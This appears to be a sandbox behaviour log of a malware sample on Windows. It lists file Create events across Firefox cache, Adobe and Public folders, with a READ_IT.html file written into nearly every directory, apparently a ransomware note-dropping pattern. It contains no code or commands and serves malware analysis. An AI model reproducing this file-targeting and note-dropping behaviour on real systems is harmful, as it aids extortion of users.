Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\goog-phish-shavar.sbstore	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\test-malware-simple.cache	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\test-malware-simple.pset	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\test-malware-simple.sbstore	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\test-phish-simple.cache	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\test-phish-simple.pset	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\test-phish-simple.sbstore	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\OfflineCache\index.sqlite	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\OfflineCache\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\_CACHE_001_	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\_CACHE_002_	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\_CACHE_003_	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\_CACHE_MAP_	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\F\A2\70853d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\F\A2\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\F\94\C3F14d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\F\94\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\F\23\7E0FEd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\F\23\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\E\E9\1A006d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\E\E9\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\E\69\885EEd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\E\69\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\E\57\C6B34d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\E\57\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\E\45\C6466d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\E\45\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\D\FE\A0C36d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\D\FE\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\D\08\71469d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\D\08\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\D\07\1F307d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\D\07\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\C\7F\996B5d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\C\7F\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\C\1F\7ADBDd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\C\1F\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\B\E5\9A8D1d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\B\E5\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\B\64\37ABBd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\B\64\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\A\CE\65483d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\A\CE\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\A\AE\CF1AEd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\A\AE\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\FD\57344d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\FD\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\E0\F17B2d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\E0\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\C3\6DBC9d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\C3\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\8D\2B984d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\8D\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\49\38779d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\49\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\2C\24B53d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\2C\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\10\16A09d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\9\10\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\8\AE\93407d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\8\AE\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\8\67\68348d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\8\67\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\7\26\90EEBd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\7\26\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\5\F1\C8C27d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\5\F1\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\5\1B\2561Dd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\5\1B\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\4\EE\95599d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\4\EE\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\4\20\CFA2Fd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\4\20\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\3\DA\2555Ed01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\3\DA\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\2\BC\A59C0d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\2\BC\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\2\59\DD6B0d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\2\59\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\1\F6\CBD4Dd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\1\F6\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\1\E4\3C9ECd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\1\E4\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\1\14\BCC16d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\1\14\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\1\0C\642BBd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\1\0C\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\1\03\3E20Ad01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\1\03\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\0\F4\9ADE8d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\0\F4\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\0\E1\EBFA5d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\0\E1\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\0\CB\44E8Cd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\0\CB\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\0\A8\C3B7Bd01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\0\A8\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\0\98\B60F3d01	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\Cache\0\98\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Color\ACECache11.lst	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Color\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Color\Profiles\wscRGB.icc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Color\Profiles\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Color\Profiles\wsRGB.icc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Acrobat\10.0\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Adobe\Acrobat\10.0\Cache\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Videos\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Videos\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Videos\Sample Videos\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Videos\Sample Videos\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
